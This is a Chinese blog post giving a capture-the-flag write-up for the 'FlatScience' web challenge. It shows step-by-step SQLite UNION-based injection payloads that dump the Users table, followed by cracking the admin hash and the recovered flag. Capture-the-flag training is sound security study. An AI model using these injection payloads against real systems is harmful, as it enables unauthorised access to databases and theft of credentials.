【攻防世界WEB】难度四星12分进阶题:FlatScience

二、FlatScience

 

解题方法:

1、理解源码,数据库注入,加解密

过程:

还是先喜欢看robots.txt文件

/admin.php界面

/login.php界面


 Ctrl+U打开源码

发现了?debug

 发现了新源码


开始进行代码审计

发现数据库为SQLite3(与MySQL有一点区别,sqlite_master表中存着相关信息

type/name/tbl_name/rootpage/sql记录着用户创建表时的相关信息

且注释符为--

还发现输入的usr存在注入

没有任何过滤,能够拼接进数据库中执行


 使用bp拦截,并进行注入

(在bp中注入)

 判断字段数

1' order by 3 --

(报错)

 1' order by 2 --

(回显正常)

所以字段数为2


判断回显

1' union select 1,2 --

回显位为第二位

 


查sql表中字段

 CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29

 解码后

 CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))

字段有:id name password hint


构造查询name

payload:

1' union select id, name from Users--

 admin


构造查询password

payload:

1' union select id, password from Users--

3fab54a50e770d830c0416df817567662a9dc85c


构造查询hint

payload:

1' union select id, hint from Users--

 my+fav+word+in+my+fav+paper%3F%21

解码后

my+fav+word+in+my+fav+paper?!


我们就得到了表中第一个数据

id=1

name=admin

password=3fab54a50e770d830c0416df817567662a9dc85c(MD5是消息摘要加密,可能会解不出来)

hint=my+fav+word+in+my+fav+paper?!(说的就是在他的论文里面)

 

解密出来了为

ThinJerboaSalz!


那个词为Salz

ThinJerboaSalz!减去Salz

所以密码为ThinJerboa


在/admin.php页面进行登录

flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?} 

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值